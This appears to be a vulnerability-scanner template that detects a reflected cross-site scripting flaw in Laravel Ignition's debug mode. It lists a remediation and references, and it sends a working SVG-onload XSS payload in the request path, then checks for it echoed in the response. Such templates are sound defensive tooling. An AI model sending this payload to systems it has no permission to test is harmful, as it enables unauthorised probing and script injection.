id: laravel-ignition-xss

info:
  name: Laravel Ignition - Cross-Site Scripting
  author: 0x_Akoko
  severity: high
  description: |
    Laravel Ignition contains a cross-site scripting vulnerability when debug mode is enabled.
  remediation: |
    Disable debug mode by setting APP_DEBUG to false.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/laravel-ignition-reflected-cross-site-scripting/
    - https://github.com/facade/ignition/issues/273
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: laravel,xss,ignition

http:
  - method: GET
    path:
      - "{{BaseURL}}/_ignition/scripts/--><svg%20onload=alert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Undefined index: --><svg onload=alert(document.domain)> in file"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 500

# digest: 490a0046304402203f99162e01e33875769cb937e1d45aec02e609a396463bbc52c7e7dddb87f896022026d63887c3c4dd58101ba7382b004f7dcbc15f25d059178def83d77989652206:922c64590222798bb761d5b6d8e72950
